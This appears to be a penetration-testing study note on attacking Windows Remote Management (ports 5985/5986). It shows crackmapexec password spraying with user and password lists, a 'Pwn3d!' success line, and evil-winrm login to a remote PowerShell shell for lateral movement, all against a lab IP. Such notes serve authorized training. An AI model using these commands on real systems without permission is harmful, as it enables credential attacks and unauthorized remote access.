WinRM [5985, 5986]

WinRM is Microsoft’s implementation of the Web Services-Management Protocol (WS-Management).

  • Based on SOAP and XML Web Services

  • Enables remote administration of Windows systems

  • Interfaces with WMI, WBEM, and optionally DCOM

πŸ” Security & Configuration

  • Not enabled by default on Windows 10

  • Must be manually activated and configured

  • Heavily reliant on domain/local environment security

Port
Protocol

5985

HTTP

5986

HTTPS (secured via certificates)

πŸ” Best practice: Use certificates or secure authentication mechanisms

Tools for WinRM Exploitation

CrackMapExec (CME)

A versatile post-exploitation tool often called the Swiss Army Knife for Pentesters πŸ—‘οΈ

Supports: SMB, LDAP, MSSQL, SSH, and WinRM

πŸ”§ Installation

sudo apt-get -y install crackmapexec
# or
sudo apt-get -y install netexec  # Community rebrand/fork

πŸ” Example with WinRM:

crackmapexec winrm 10.129.42.197 -u user.list -p password.list

βœ”οΈ Success Output Example:

WINRM  10.129.42.197  5985  NONE [+] None\user:password (Pwn3d!)

🟒 Pwn3d! indicates successful login and likely command execution capability.

πŸ“š CME Help Options

  • General Help:

crackmapexec -h

  • Protocol-specific Help:

crackmapexec smb -h
crackmapexec winrm -h

Great for discovering additional modules like enumeration, file access, or lateral movement scripts.

Login with Evil-WinRM

An essential tool designed specifically for communicating with WinRM endpoints πŸͺŸπŸ”

πŸ”§ Installation

sudo gem install evil-winrm

πŸ’» Basic Usage

evil-winrm -i <target-IP> -u <username> -p <password>

πŸ” Example:

evil-winrm -i 10.129.42.197 -u user -p password

βœ… On success, a PowerShell Remoting Protocol shell is launched:

*Evil-WinRM* PS C:\Users\user\Documents>

🎯 Use this session to enumerate, download/upload files, escalate privileges, and move laterally within the network.

PreviousπŸ–₯️ Network ServicesNextSSH [22]

Last updated